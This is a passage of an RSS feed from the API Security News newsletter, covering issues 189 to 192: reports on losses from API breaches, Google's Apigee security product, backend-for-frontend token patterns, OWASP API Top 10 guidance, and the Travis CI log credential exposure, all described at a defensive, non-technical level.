<p>The post <a href="https://apisecurity.io/issue-192-vulnerable-apis-costing-75-billion-new-google-api-security-platform/">Issue 192: Vulnerable APIs costing $75 billion, new Google API security platform</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have a report from Imperva indicating that vulnerable APIs may be costing as much as $75 billion annually with the largest organizations being at the highest risk. We also have coverage of the new API security platform from Google, views from Curity on API-driven backends for frontends for increased API security, and finally a comprehensive beginners guide to the OWASP API security Top 10 from Tyk.</p>
<h2>Report: Vulnerable APIs costing $75 billion</h2>
<p>Last week <a href="https://apisecurity.io/issue-191-api-insecurity-causing-rising-incidents-policy-as-code-for-api-security/" target="_blank" rel="noopener noreferrer">we featured coverage</a> of the recent from Imperva in partnership with the Marsh McLennan Global Cyber Risk Analytics Center which indicated that one in thirteen incidents originated with insecure APIs. This week <a href="https://venturebeat.com/2022/06/22/vulnerable-apis-75bn/" target="_blank" rel="noopener noreferrer">we look at the financial impact of vulnerable APIs</a> courtesy of VentureBeat. The headline figures estimate the range of possible financial impact as follows:</p>
<ul>
<li><strong>Average annual API-related U.S. cyber loss</strong> — USD 12-23 billion</li>
<li><strong>Average annual API-related total global cyber loss</strong> — USD 41-75 billion</li>
<li><strong>Average annual API-related global insured cyber loss</strong> — USD 205-376 million</li>
</ul>
<p>Although any research estimating the hypothetical cost of breaches has a large margin of error, these figures are quite sobering. For me, the most important takeaway is that such losses are entirely avoidable by investing adequately in API security solutions and protection. As the authors conclude: <cite>API-related losses could decrease significantly even as their API adoption continues to increase.</cite></p>
<p>Lebin Cheng, vice president of API Security, Imperva provided further comment on the reasons why companies are failing to protect their APIs: <cite>Many organizations are failing to protect their APIs because it requires equal participation from the security and development teams.</cite> A successful API security initiative requires a balanced approach focused on people, processes, and technology. Of these, it is the people aspect that is hardest to get right — on the one hand, security needs to avoid negatively impacting developer productivity, whilst developers need to take responsibility for the security of their code.</p>
<p>The full report is available from the <a href="https://www.imperva.com/resources/resource-library/reports/quantifying-the-cost-of-api-insecurity/" target="_blank" rel="noopener noreferrer">Imperva website</a>.</p>
<h2>Article: Google launches new API security platform</h2>
<p>On the topic of API security tooling and solutions <a href="https://securityboulevard-com.cdn.ampproject.org/c/s/securityboulevard.com/2022/06/google-launches-advanced-api-security-to-combat-api-threats/amp/" target="_blank" rel="noopener noreferrer">comes the news that Google has announced</a> a new product called Advanced API Security which is currently in preview mode. The product is built on top of their popular Apigee API gateway and focuses on two key API security areas: identifying API proxy misconfiguration and protecting against bot-based attacks. The new product is aimed specifically at Google&#8217;s financial services customers — currently, four out of five US banks use Apigee.</p>
<p>In this newsletter, <a href="https://apisecurity.io/issue-173-coinbase-vulnerability-authn-authz-best-practices-bad-bots-hack-elgato-key-light/" target="_blank" rel="noopener noreferrer">we frequently cover</a> the rising instances of bot attacks against APIs and it comes as no surprise that bot protection is to be incorporated into Apigee. Although not much technical detail is provided on the underlying technology the bot protection will assess unusual traffic patterns from a single IP address to identify possible attacks, and in particular to focus on HTTP 200 OK responses since these indicate a successful bot transaction.</p>
<p>Of all the OWASP API Security Top 10 vulnerabilities <a href="https://apisecurity.io/encyclopedia/content/owasp/api7-security-misconfiguration" target="_blank" rel="noopener noreferrer">API7:2019 — Security misconfiguration</a> is possibly one of the easiest to prevent using automated inspection of API servers and gateways to identify common security misconfigurations. This is the other focus area for the Advanced API Security product and although details are scant at this stage it appears the product will scan APIs and traffic to identify information disclosure or leakage, typically PII or healthcare data.</p>
<p>As per the first article, many API-based attacks are preventable using appropriate security tooling — this offering from Google undoubtedly improves the API security posture for their users.</p>
<h2>Article: API-driven backends for frontends for increased API security</h2>
<p>Next,<a href="https://thenewstack.io/secure-the-web-with-an-api-driven-backend-for-frontend/" target="_blank" rel="noopener noreferrer"> we have an excellent technical article</a> from Gary Archer at Curity on the topic of API-driven backends for frontends for increased API security. The article gives an excellent discussion on how to secure modern web applications based on the single-page application (SPA) model. Typically these comprise two backends — the first is a content-delivery-network (CDN) delivering static or server-rendered content, and the second is an API backend responsible for providing dynamic page content based on user operations.</p>
<p>The article describes robust and scalable approaches to provide API security based on OAuth2 and OpenID patterns. In the first diagram below the API backend is split into two components — the so-called backend-for-frontend is responsible for handling the initial authentication and returning an opaque token that can be embedded in a standard web cookie. The SPA can then make subsequent requests to the APIs by presenting the web cookie which is exchanged for a JWT to be validated by the API backend.</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-9789" src="https://apisecurity.io/wp-content/uploads/2022/07/Article3a.png" alt="" width="606" height="267" /></p>
<p>Curity describes their <em>API-driven Backend for Frontend</em> pattern to facilitate a scalable and compact solution based on standard components. As shown below an OAuth agent handles the initial authentication, and in subsequent requests, an OAuth proxy is responsible for exchanging the web cookies into JWTs that are presented to the API backend.</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-9787" src="https://apisecurity.io/wp-content/uploads/2022/07/Article3.jpg" alt="" width="629" height="263" /></p>
<p>Once again a great read from Curity — use the <em>API-driven Backend for Frontend</em> to manage the issue of secure cookies and helps to separate web and API concerns.</p>
<h2>Article: Introduction to OWASP API security Top 10</h2>
<p>Finally this week <a href="https://tyk.io/blog/res-owasp-api-security-intro/" target="_blank" rel="noopener noreferrer">we have another contribution</a> to the body of knowledge on the OWASP API Security Top 10, this time from the team at Tyk.</p>
<p>Tyk provides an unusual take on the Top 10, focusing on the OWASP Risk Rating Methodology to rate and rank the Top 10 vulnerabilities. This methodology evaluates risks against different criteria; threat agent, exploitability, weakness prevalence, weakness detectability, technical impact, and business impact. This interesting approach gives security teams a sense of the relative priority of vulnerabilities to allow focused remediation.</p>
<p>The article provides a really great deep dive into each of the Top 10, including the attack vector, the impact, and common defense approaches. Tyk also describes how API management solutions can address the vulnerabiltiy.</p>
<h2>Webinar: Review of API Breaches in H1 2022: Episode two &#8211; Remediation and Prevention</h2>
<p>Last month I presented a webinar on a dozen of the API breaches in this newsletter, and on the 21st July, I&#8217;ll be hosting the <a href="https://42crunch.com/api-breaches-h1-2022/" target="_blank" rel="noopener noreferrer">second part of this popular webinar</a>.</p>
<p>In this webinar, I&#8217;ll be getting into practical guidance on preventing and remediating some of these breach types. In particular, we&#8217;ll focus on the following topics:</p>
<ul>
<li>Apply defensive coding practices to secure APIs from such vulnerabilities.<br />
Practical demonstration of how 42Crunch can detect and protect from such vulnerabilities.</li>
</ul>
<p>&nbsp;</p>
<p><a href="https://42crunch.com/api-breaches-h1-2022/" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="alignnone wp-image-9791" src="https://apisecurity.io/wp-content/uploads/2022/07/Article5.jpg" alt="" width="605" height="165" /></a></p>
<p>The post <a href="https://apisecurity.io/issue-192-vulnerable-apis-costing-75-billion-new-google-api-security-platform/">Issue 192: Vulnerable APIs costing $75 billion, new Google API security platform</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 191: API insecurity causing rising incidents, policy-as-code for API security</title>
		<link>https://apisecurity.io/issue-191-api-insecurity-causing-rising-incidents-policy-as-code-for-api-security/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 29 Jun 2022 16:35:40 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9742</guid>

					<description><![CDATA[<p>This week, we have a report from Imperva on the increasing security incidents caused by unsecured APIs. We also have articles on using policy-as-code to improve API security, views on how common assumptions may prevent effective API protection, and how open APIs are improving cloud-based security. Report: One in thirteen incidents blamed on API insecurity [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-191-api-insecurity-causing-rising-incidents-policy-as-code-for-api-security/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-191-api-insecurity-causing-rising-incidents-policy-as-code-for-api-security/">Issue 191: API insecurity causing rising incidents, policy-as-code for API security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have a report from Imperva on the increasing security incidents caused by unsecured APIs. We also have articles on using policy-as-code to improve API security, views on how common assumptions may prevent effective API protection, and how open APIs are improving cloud-based security.</p>
<h2>Report: One in thirteen incidents blamed on API insecurity</h2>
<p>First up is <a href="https://portswigger.net/daily-swig/one-in-every-13-incidents-blamed-on-api-insecurity-report" target="_blank" rel="noopener noreferrer">PortSwigger&#8217;s coverage of a recent report</a> sponsored by Akamai, in which over 117,000 cybersecurity incidents were analyzed to understand trends and patterns in them.</p>
<p>The first finding of report is that the occurrence of API-related incidents varied between 4.1% and 7.5%, with the likelihood directly proportional to the size of the organization: the bigger the company, the bigger the chances for API-related security incidents.</p>
<p>The researchers provided insight into the nature of API attacks — these range from distributed denial-of-service (DDoS) attacks, to machine-in-the-middle (MitM) attacks exfiltrating sensitive data, account takeovers, and tampering with API data. Unsurprisingly, the authors cited two primary reasons for API insecurity: the rapid proliferation of APIs, and a lack of visibility into the exposed APIs and/or their security posture.</p>
<p>The other interesting takeaway from the report is the occurrence of API-related incidents across various industry verticals. In information technology industry, up to 23% of incidents can be traced back to APIs — presumably, this is in large part because of the use of APIs for the interconnection of platforms, services, and cloud infrastructure. Professional services were next highest on the list, followed by manufacturing, transport, and utilities. The healthcare industry reported the lowest occurrence of API-related incidents at 1%, presumably due to the increased rigor of software development in this industry, and stringent compliance requirements.</p>
<p>The <a href="https://www.imperva.com/resources/resource-library/reports/quantifying-the-cost-of-api-insecurity/" target="_blank" rel="noopener noreferrer">original report is worth a read</a> for deeper insights into the research.</p>
<h2>Article: Using policy-as-code to improve API security</h2>
<p>The emergence of the practice of &#8220;everything-as-code&#8221; has led to significant improvements in how IT systems are built — just think of the ease with which complex infrastructure can be composed with Terraform. Using code as the single source of truth provides improvements in auditability and readability, and allows the adoption of code development best practices, such as version control.</p>
<p>This week, we have <a href="https://sdtimes.com/api/how-policy-as-code-can-simplify-api-security/" target="_blank" rel="noopener noreferrer">views from Mark Cassetta of Axiomatics</a> on how policy-as-code can be applied to APIs to improve security. Cassetta describes how authorization and access control policies are typically implemented as ad-hoc policies managed in different business units across the organization. The net result is APIs with inconsistent policy enforcement and access control, often a root cause of API security problems.</p>
<p>By opting for a policy-as-code approach, a policy can be applied in a uniform fashion across disparate teams in an organization. By leveraging code development practices, savvy teams can benefit from version control, testing, validation, and automated injection of policies through CI/CD pipelines.</p>
<p>The author cites three main advantages of using policy-as-code:</p>
<ul>
<li><strong>Establishing best practices</strong>: By using policy-as-code, organizations can adopt best practices for authorization and access control, and ensure these are considered as first-class elements of the development lifecycle.</li>
<li><strong>Shift-Left</strong>: Using a policy-as-code approach ensures that security requirements are injected into the development process as early as possible, avoiding security being seen and added as an afterthought.</li>
<li><strong>Focus on policies</strong>: Finally, by focusing on policies expressed as code and stored in a central repository, teams are able to learn from one another and cross-pollinate ideas for complex, dynamic policies. In addition, by going for a centralized approach, organizations can use a central policy decision point (PDP) to enforce policy rather than relying on a distributed model where each API implements policies separately. Developers can focus on functionality and offload policy decisions to a central PDP.</li>
</ul>
<p>Previously, <a href="https://42crunch.com/automate-api-protection-with-security-as-code-webinar-recording/" target="_blank" rel="noopener noreferrer">I&#8217;ve presented on the topic of &#8220;security as code&#8221;</a> for API protection. I feel the ability to centrally apply policies and removing the burden from the API development teams are massive benefits of this approach.</p>
<h2>Article: Four assumptions preventing effective API protection</h2>
<p>One hotly debated topic in API security is whether existing protections are sufficient for robust API security, or if dedicated solutions are required. This week, Radware has <a href="https://blog.radware.com/application-security-4/2022/02/4-assumptions-preventing-effective-api-protection/" target="_blank" rel="noopener noreferrer">contributed their thoughts on the topic</a> and provided four common assumptions that may be preventing effective API security:</p>
<ul>
<li><strong>WAF protects applications and the associated APIs</strong>: Whilst web application firewalls (WAFs) are somewhat effective for web applications, they perform poorly with APIs because they lack the context of the payloads and contract, meaning that they cannot distinguish the expected behavior from the unexpected. WAFs also operate based on a negative security model (attempting to block known bad content) which leads in high number of both false positives and negatives.</li>
<li><strong>API gateway manages and protects my APIs</strong>: API gateways provide a level of protection for APIs by enforcing transport security, rate limiting, quotas, and authentication. However, API gateways have significant limitations, such as the lack of a positive security model engine, bot protection capabilities, behavioral analysis, and application DoS protection. Do leverage API gateways, but be aware of gaps in protection.</li>
<li><strong>APIs are well documented, enabling effective protection</strong>: API protection technologies are dependent on well-documented APIs, however in many organizations, this documentation is incomplete or non-existent. Ensure that you have a strategy for discovering undocumented APIs and enrolling them in a managed API program.</li>
<li><strong>Using dedicated API protection solutions provides perfect security</strong>: Avoid being complacent even when you are using a dedicated API protection product. Remember that there are other elements to comprehensive API security, like threat intelligence, bot detection, and DDoS defense.</li>
</ul>
<p>As is ever true in cybersecurity, the best approach is a layered defense-in-depth strategy.</p>
<h2>Article: Open APIs improving cloud-based security</h2>
<p>Finally this week, we have <a href="https://www.developer-tech.com/news/2022/jun/01/how-cloud-based-security-is-becoming-more-powerful-thanks-to-open-apis/" target="_blank" rel="noopener noreferrer">some interesting thoughts</a> on how open APIs can improve cloud-based security systems.</p>
<p>Firstly, open APIs allow greater interoperability between disparate systems: instead of designing a bespoke API, vendors are increasingly adopting a relevant open API standard. This results in shorter times to market, and higher levels of integration into security platforms and portals.</p>
<p>Secondly, adopting open APIs and open-source software vendors can achieve higher levels of manageability in security systems, either through the use of management platforms or remotely located service teams.</p>
<p>Adopt the lessons of open-source software and avoid (re-)inventing an API that may already exist out there in an open format.</p>
<p>The post <a href="https://apisecurity.io/issue-191-api-insecurity-causing-rising-incidents-policy-as-code-for-api-security/">Issue 191: API insecurity causing rising incidents, policy-as-code for API security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 190: Akamai&#8217;s report on APIs, API security checklist, dangers of API security overconfidence</title>
		<link>https://apisecurity.io/issue-190-akamais-report-on-apis-api-security-checklist-dangers-of-api-security-overconfidence/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 22 Jun 2022 17:07:13 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9721</guid>

					<description><![CDATA[<p>This week, we have a report from Akamai focusing on APIs which they describe as &#8220;the attack surface that connects us all&#8221;. We also feature an API security checklist that covers seven of the most important requirements, and an article on the dangers of API security overconfidence. Finally, we round off with a video from [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-190-akamais-report-on-apis-api-security-checklist-dangers-of-api-security-overconfidence/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-190-akamais-report-on-apis-api-security-checklist-dangers-of-api-security-overconfidence/">Issue 190: Akamai&#8217;s report on APIs, API security checklist, dangers of API security overconfidence</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have a report from Akamai focusing on APIs which they describe as &#8220;the attack surface that connects us all&#8221;. We also feature an API security checklist that covers seven of the most important requirements, and an article on the dangers of API security overconfidence. Finally, we round off with a video from Neil Madden on self-contained tokens and JWTs.<cite></cite></p>
<h2>Report: Akamai&#8217;s report on API: the attack surface that connects us all</h2>
<p>First up this week<a href="https://www.akamai.com/resources/state-of-the-internet/soti-security-api-the-attack-surface-that-connects-us-all" target="_blank" rel="noopener noreferrer"> we have the latest State of the Internet report</a> from Akamai.  This year&#8217;s report focuses on APIs – which they describe as &#8220;the attack surface that connects us all&#8221; –  and surveys the state of API security in 2022.</p>
<p>The report focuses on a number of high-profile API breaches and pays particular attention to <a href="https://apisecurity.io/issue-156-fhir-apis-vulnerable-abuse-3d-printers-facing-hijacking-risk-api-security-webinar/" target="_blank" rel="noopener noreferrer">the research into FIHR APIs by Alissa Knight</a>, which found that the majority of FIHR APIs had security vulnerabilities. With the cooperation of static analysis vendor Veracode, the authors conducted assessments of over 5000 SpringBoot applications and discovered that all of them had at least one serious vulnerability, and many exhibited serious flaws in the OWASP Top 10, including SQL injection and cross-site-scripting (XSS).</p>
<p>The authors provide some interesting insight into why API vulnerabilities exist in the first place, suggesting that API security is experiencing many of the early pains that were also there with web application security. The most frequently cited reason for vulnerable APIs was the pressure of deadlines for delivery which led to vulnerabilities being ignored or simply not being detected. In many cases, the development team decided that detected vulnerabilities were low risk and did not warrant remediation – this is a frequently encountered attitude that can have dire consequences. Other reasons included the use of vulnerable open source code or a lack of specific security knowledge. The report also found that distributed denial-of-service (DDoS) attacks were rising and credential abuse is becoming the number one attack vector.</p>
<p>The report concludes with some best practices for API security, such as:</p>
<ul>
<li>Discover your APIs and track them in your inventory.</li>
<li>After the APIs have been discovered, ensure they are tested and that any vulnerabilities found are tracked and addressed.</li>
<li>Leverage existing WAF infrastructure, and identity management and data protection solutions.</li>
<li>Use broad brush policies that use safe defaults.</li>
<li>Create awareness of the <a href="https://apisecurity.io/encyclopedia/content/owasp/owasp-api-security-top-10-cheat-sheet" target="_blank" rel="noopener noreferrer">specific API security risks</a> amongst stakeholders.</li>
</ul>
<h2>Article: API security checklist</h2>
<p>Guides for improving API security are always popular with readers of this newsletter, and in this issue we have <a href="https://www.indusface.com/blog/api-security-checklist-the-top-7-requirements/" target="_blank" rel="noopener noreferrer">a checklist of the top seven requirements for API security</a>.</p>
<p>The author suggests the following seven focus areas:</p>
<ul>
<li><strong>API discovery and inventorying</strong>: You cannot secure what you cannot see, so use continuous discovery and inventorying to understand your API estate. Use automated scanners or traffic analysis to build a view of your estate, and perform traffic analysis to discover unused, shadow, or zombie APIs.</li>
<li><strong>Securing APIs with instant threat detection and protection</strong>: Use advanced traffic monitoring techniques based on machine learning or AI to automate API protection. Actively monitor your APIs and ensure that systems are patched and that vulnerabilities are addressed.</li>
<li><strong>API access control and authentication</strong>: Rugged methods for authentication and authorization should be employed throughout the API ecosystems to mitigate key attack vectors. Use zero-trust principles, minimum privilege levels, limited token lifetimes, and token expiration to prevent replay attacks.</li>
<li><strong>API design and development</strong>: The design and development process should include security as a key element from design through to testing. Use appropriate API security tooling to assist developers in producing secure APIs.</li>
<li><strong>API security testing</strong>: Perform continuous security testing throughout the lifecycle, including specialist penetration tests.</li>
<li><strong>API logging and monitoring</strong>: Logging and monitoring of APIs and their traffic are vital to detect abnormal behavior and possible attacks.</li>
<li><strong>Incidence response</strong>: Ensure that your organization has an incident response plan in the event of an API breach or incident.</li>
</ul>
<p>A great checklist covering the full API development lifecycle – definitely one to bookmark.</p>
<h2>Article: The dangers of API security overconfidence</h2>
<p>Recently, Radware produced a survey of the state of API security in 2022, and four key takeaways from it are covered in <a href="https://securityboulevard.com/2022/06/the-danger-of-api-security-overconfidence-four-takeaways-from-radwares-2022-state-of-api-security-survey/" target="_blank" rel="noopener noreferrer">this article from Security Boulevard</a>.</p>
<p>The article highlights the fact that over 92% of organizations reported a growth in their API usage in the last year, yet showed over-confidence in their API protection approaches. In fact, nearly half of the respondents indicated they felt their protections were very effective. In light of the frequency that API breaches are covered in this newsletter, this might suggest such confidence to be misplaced.</p>
<p>The four key takeaways affecting API security are:</p>
<ul>
<li><strong>The threat of undocumented APIs</strong>: As discussed in the previous article, the lack of visibility into the API estate presents an unquantified risk. Over 60% of respondents felt a third of their APIs were undocumented.</li>
<li><strong>API attacks are flying under the radar</strong>: Many existing tools are simply unable to detect and protect against API threats and attacks.</li>
<li><strong>Open source contributes to the security myth</strong>: Many respondents believed that open source code may be more secure than proprietary code. High-profile incidents, such as Log4j and Heartbleed, indicate this perception may be misplaced.</li>
<li><strong>Bot attacks remain a threat</strong>: Bot attacks continue to rise, with over a third of respondents stating that bot attacks are their number one attack vector. Additionally, commonly used protections, such as WAFs and API gateways, are ineffective at protecting against bot attacks.</li>
</ul>
<p>There&#8217;s no place for complacency when it comes to API security.</p>
<h2>Video: Neil Madden on self-contained tokens and JWTs</h2>
<p>Finally this week, we have a <a href="https://www.youtube.com/watch?v=O3G1pigc3zQ" target="_blank" rel="noopener noreferrer">video</a> from the man who literally <a href="https://www.manning.com/books/api-security-in-action?utm_source=youtube&amp;utm_medium=organic&amp;utm_campaign=book_madden_api_10_27_20" target="_blank" rel="noopener noreferrer">wrote the book</a> covering the topic of self-contained tokens and JWTs.</p>
<p>This is an absolutely vital topic for anyone involved with building APIs, and Neil is an expert in this space. The video takes the viewer through Java code samples that show the key concepts, including in-depth coverage of JWT validation.</p>
<p>Eagle-eyed readers may spot a discount code for Neil&#8217;s book, which I can certainly recommend for anyone&#8217;s library.</p>
<p>The post <a href="https://apisecurity.io/issue-190-akamais-report-on-apis-api-security-checklist-dangers-of-api-security-overconfidence/">Issue 190: Akamai&#8217;s report on APIs, API security checklist, dangers of API security overconfidence</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 189: Vulnerability in Travis CI log API, Microsoft guide to API security, and why API security needs special attention</title>
		<link>https://apisecurity.io/issue-189-vulnerability-in-travis-ci-log-api-microsoft-guide-to-api-security-and-why-api-security-needs-special-attention/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 15 Jun 2022 17:00:53 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9691</guid>

					<description><![CDATA[<p>This week, we have news of an API vulnerability in the Travis CI platform that allowed to access logs on public instances, leading to leaking keys and tokens. Also this week, we have an excellent guide from Microsoft on their recommendations how to mitigate against API threats, some views from the Economic Times on why [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-189-vulnerability-in-travis-ci-log-api-microsoft-guide-to-api-security-and-why-api-security-needs-special-attention/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-189-vulnerability-in-travis-ci-log-api-microsoft-guide-to-api-security-and-why-api-security-needs-special-attention/">Issue 189: Vulnerability in Travis CI log API, Microsoft guide to API security, and why API security needs special attention</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have news of an API vulnerability in the Travis CI platform that allowed to access logs on public instances, leading to leaking keys and tokens. Also this week, we have an excellent guide from Microsoft on their recommendations how to mitigate against API threats, some views from the Economic Times on why API security needs special attention, and updates on the OWASP crAPI project.</p>
<h2>Vulnerability: Credential leak in Travis CI log API</h2>
<p>Team Nautilus at Aquasec has found <a href="https://blog.aquasec.com/travis-ci-security" target="_blank" rel="noopener noreferrer">an ongoing vulnerability affecting public instances of the Travis CI platform</a>. The vulnerability exposes tens of thousands of user tokens (typically for GitHub, AWS, and DockerHub) in historical Travis CI logs that are accessible through an API. Similar issues have been reported in 2015 and 2019, and in this newsletter we featured news of token leaks on Travis CI <a href="https://apisecurity.io/issue-152-exposed-api-keys-tokens-sast-dast-api-security-testing-value-api-specifications/" target="_blank" rel="noopener noreferrer">late last year</a>.</p>
<p>Travis CI is a popular CI/CD platform that acts as a build orchestrator for software artifacts. As such, the platform requires access to various 3rd party platforms such, like source code repositories, container registries, and cloud platforms. Typically, the access credentials to these resources are stored as secrets in the CI/CD platform, only for internal use, and thus not accessible to the casual observer.</p>
<p>However, the researchers discovered that they could access historical logs of build jobs through a publicly accessible API. Using scripts to paginate through the log files, they determined that approximately 770 million logs were exposed. By examining the contents, they were able to identify secret values associated with various platforms:</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-9702" src="https://apisecurity.io/wp-content/uploads/2022/06/Article1.jpg" alt="" width="600" height="237" /></p>
<p>The researchers did reveal that Travis CI did provide some mitigation against mass leakage: the API endpoint was rate limited, in many cases the secret values were masked in the log files, and they also recommend various techniques for masking secrets and deleting old log files.</p>
<p>Nonetheless, the sheer volume of logs available through the API endpoint pagination meant that tens of thousands of secrets may be accessible, representing a significant risk to assets on impacted 3rd party platforms. The researchers quoted Travis CI&#8217;s response that the issue is &#8220;by design&#8221; — Travis CI has also previously be found wanting in their response to a similar leak. Users are urged to be cautious with credentials stored on Travis CI, including deleting log files, revoking and reissuing credentials, and narrowing down the roles in credentials to the bare minimum required to lessen the impact.</p>
<p>There are several important lessons to be learned here:</p>
<ul>
<li>Do not rely on security by obscurity — in this case, the platform stored old log files under an undisclosed endpoint but this could easily be reverse-engineered.</li>
<li>Rate limiting is important, but it is only one element of an API defense strategy.</li>
<li>Always have a plan for revoking and reissuing credentials, both in an emergency and as part of security routine.</li>
</ul>
<h2>Article: Microsoft&#8217;s recommendations for mitigating against API threats</h2>
<p>Microsoft has produced <a href="https://docs.microsoft.com/en-us/azure/api-management/mitigate-owasp-api-threats" target="_blank" rel="noopener noreferrer">a high-quality set of recommendations</a> for how to mitigate OWASP API security Top 10 threats with API management. Although primarily targeted at users of their Azure API tools (the balance of the recommendations focuses on using Azure platform features for secure configuration and monitoring), the recommendations are well-written and contain many excellent generic recommendations — I learned a lot here, and recommend bookmarking this as a checklist for hardening your APIs.</p>
<p>For me, some of the standout recommendations include:</p>
<ul>
<li>For <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">API1:2019 — Broken object level authorization</a>, the correct place for mitigation is through comprehensive authorization in the backend API code. Gateways can only offer limited defense, mainly by obscuring internal object identifiers.</li>
<li>For <a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication" target="_blank" rel="noopener noreferrer">API2:2019 — Broken authentication</a>, leverage the power of the gateway to enforce uniform authentication across all endpoints by using standard methods, such as OAuth2 and JWT tokens.</li>
<li>For <a href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure" target="_blank" rel="noopener noreferrer">API3:2019 — Excessive data exposure</a>, again the best way to mitigate against this vulnerability is the judicious design of the data storage objects in the API backend code. Gateways can offer content validation but users should be aware of performance impacts with this method.</li>
<li>For <a href="https://apisecurity.io/encyclopedia/content/owasp/api4-lack-of-resources-and-rate-limiting" target="_blank" rel="noopener noreferrer">API4:2019 — Lack of resources and rate limiting</a>, gateways can offer short-term and long-term rate limiting; use the OpenAPI definition to limit the amount of data that can be accessed by specifying length limits; use Cross-Origin Policy (CORS) but avoid wildcards; and revoke access for users who abuse resources.</li>
<li>For <a href="https://apisecurity.io/encyclopedia/content/owasp/api5-broken-function-level-authorization" target="_blank" rel="noopener noreferrer">API5:2019 — Broken function level authorization</a>, the obvious recommendation is to requiring subscription keys for all endpoints by default and to avoid the use of wildcard endpoints.</li>
<li>For <a href="https://apisecurity.io/encyclopedia/content/owasp/api6-mass-assignment" target="_blank" rel="noopener noreferrer">API6:2019 — Mass assignment</a>, the recommendations are similar to those for API3: manage the data transfer in the API backend code.</li>
</ul>
<p>Thanks to Microsoft for the excellent set of recommendations.</p>
<h2>Article: Views on why API security needs special attention</h2>
<p>The Economic Times <a href="https://economictimes.indiatimes.com/why-does-api-security-need-special-attention/articleshow/92053756.cms" target="_blank" rel="noopener noreferrer">featured a thought-provoking read</a> on why API security needs special attention — as the author astutely states <cite>&#8220;Web applications security is not API security&#8221;.</cite></p>
<p>The most interesting observation for me was the benefits (and challenges) of the design-first approach for API development. On the upside, the use of a design-first approach through OpenAPI definitions allows for the enforcement of a very precise contract between the API and the client — quite different from web applications where the boundaries are very blurred. This is the essence of the <a href="https://42crunch.com/webinar-positive-api-security-model/" target="_blank" rel="noopener noreferrer"><em>positive security model</em> </a>that uses the OpenAPI definition as the contract and only allows <em>known good</em> and blocks everything else. The author notes the major caveat with this approach: time pressures on developers mean that a design-first approach might not always be feasible so they begin by coding the API, thereby losing the benefits of contract enforcement.</p>
<p>The author highlights additional factors that impact APIs security:</p>
<ul>
<li>Lack of visibility into API inventory can inhibit security initiatives.</li>
<li>Traditional security mechanisms (like rate limiting and network security) are useful but not entirely sufficient at thwarting threats to modern APIs.</li>
<li>Due to time pressures on developers and testers, business logic flaws may be hard to detect.</li>
</ul>
<p>Some great insight into the topic — leverage the power of your OpenAPI definitions.</p>
<h2>Article: OWASP crAPI for API hacking and learning</h2>
<p>Finally this week, <a href="https://infosecwriteups.com/crapi-api-security-the-hacker-way-7f8402bb6e65" target="_blank" rel="noopener noreferrer">a shout out</a> to the <a href="https://github.com/owasp/crapi" target="_blank" rel="noopener noreferrer">OWASP crAPI project</a> in this quick guide on how to use the project as a way to get started in learning the foundations of API security.</p>
<p>The author emphasizes the point of the API developers taking ownership of API security rather than assuming it can be delegated to other parties. The two examples cited are:</p>
<ul>
<li>&#8220;Internal APIs do not need to be secure as they are not accessed by external users&#8221; — of course, in time internal APIs may become external and as such should be designed securely by default.</li>
<li>&#8220;Access controls can be implemented centrally by the identity team and developers do not need to worry about this at the API level&#8221; — obviously, this is a dangerous assumption, and a defense-in-depth approach should be used instead.</li>
</ul>
<p>The author recommends that developers adopt a project like crAPI to hone their API security skills, that security teams use it as a means for understanding real-world API attacks, and that API protection teams use it as a test bed for assessing their protection tools.</p>
<p>As the author perfectly concludes: <cite>“Shift left is not just about shifting your tools and process but the knowledge as well.”</cite></p>
<p>The post <a href="https://apisecurity.io/issue-189-vulnerability-in-travis-ci-log-api-microsoft-guide-to-api-security-and-why-api-security-needs-special-attention/">Issue 189: Vulnerability in Travis CI log API, Microsoft guide to API security, and why API security needs special attention</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 188: API security for smart cars, ownership of the API lifecycle, APIs a top CISO concern</title>
		<link>https://apisecurity.io/issue-188-api-security-for-smart-cars-ownership-of-the-api-lifecycle-apis-are-top-ciso-concern/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
